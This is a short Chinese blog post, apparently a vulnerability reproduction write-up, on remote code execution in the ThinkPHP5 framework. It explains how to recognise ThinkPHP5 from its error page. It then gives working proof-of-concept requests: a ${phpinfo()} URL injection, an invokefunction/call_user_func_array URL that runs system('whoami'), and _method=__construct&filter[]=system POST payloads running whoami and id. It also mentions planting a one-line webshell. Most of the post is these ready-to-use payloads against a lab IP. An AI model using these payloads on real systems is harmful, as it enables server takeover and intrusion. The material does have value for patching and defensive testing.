ThinkPHP代码执行漏洞

文章详细介绍了ThinkPHP5存在的代码执行漏洞,包括特征识别(如报错页面显示的特定信息)以及三种复现漏洞的方法:通过URL参数触发phpinfo显示、调用call_user_func_array执行任意代码,以及利用_method和filter进行构造请求触发系统命令执行。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

一、ThinkPHP5代码执行漏洞

特征:被检测系统报错页面出现“十年磨一剑-为API开发设计的高性能框架”,则判定该系统使用ThinkPHP5开发

二、复现

1)

在这里插入图片描述访问
在这里插入图片描述poc:http://192.168.133.128:8080/index.php?s=1/2/3/${phpinfo()}
在这里插入图片描述写入一句话木马:
在这里插入图片描述

2)

在这里插入图片描述访问:
在这里插入图片描述
poc:
http://192.168.133.128:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1
在这里插入图片描述任意代码执行:
http://192.168.133.128:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
在这里插入图片描述

3)

在这里插入图片描述访问:
在这里插入图片描述poc1:
_method=__construct&filter[]=system&method=get&get[]=whoami
在这里插入图片描述poc2:
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id
在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值